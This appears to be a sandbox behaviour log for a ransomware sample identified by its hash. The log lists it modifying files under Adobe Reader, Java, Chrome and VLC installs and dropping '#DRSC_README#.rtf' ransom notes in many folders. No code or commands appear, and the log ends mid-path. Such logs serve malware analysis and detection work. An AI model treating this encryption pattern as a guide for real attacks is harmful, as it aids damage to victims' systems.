710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\example_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\MoreTools.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-default_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sendforcomments_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_ie8.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fil.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pt-PT.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\edit_pdf_poster2x.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\adobe_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome.dll.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496926556.profile.gz 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-execution.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\appstore.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\tzmappings 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_shared_multi_filetype.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\svgCheckboxSelected.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\COPYRIGHT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons_ie8.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\cs.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.ssl_1.1.0.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Oblique.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jdb.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\ffjcext.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_ko_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-de_de_2x.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\sat_logo_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\Close.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\javascript_poster.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\New_Skins.url 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sign-in-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.descriptorProvider.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\adc_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_listview_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoBeta.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 